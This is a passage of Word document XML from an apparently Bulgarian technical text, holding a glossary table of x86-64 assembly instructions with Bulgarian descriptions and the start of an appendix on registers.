        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>move</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>преместване на стойност между два регистъра или адрес и регистър</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lea</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>load effective address</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">същата като mov, но записва изчисленият адрес вместо да го последва </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>добавяне на стека</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>премахване от стека</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>логическа операция xor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dec</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>decrement</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>изваждане на 1 от параметъра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inc</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>increment</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>прибавяне на 1 към параметъра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>изваждане</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>събиране</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>безусловен преход към прехода</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jl</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>jump less</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>jmp, ако флагът за по-малко е вдигнат</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jnc</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>jump not carry</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>jmp, ако флагът за carry не е вдигнат</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">добавя текущия rip на стека и преход към него </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">pop на адрес от стека и преход към него </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>loop</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>еквивалентна на dec %rcx + jnc label</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>еквивалентно на push %rbp + mov %rsp, %rbp (създава кадър)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>leave</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>еквивалентно на mov %rbp, %rsp + pop %rbp (премахва кадър)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xchg</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>разменя две стойности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cltd</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>convert long to double</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>копира знака на eax в edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="3330" w:hanging="3365"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>system call</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>преход към системна функция</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc3540818"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 3 - Справочник на използваните регистри</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="22"/>
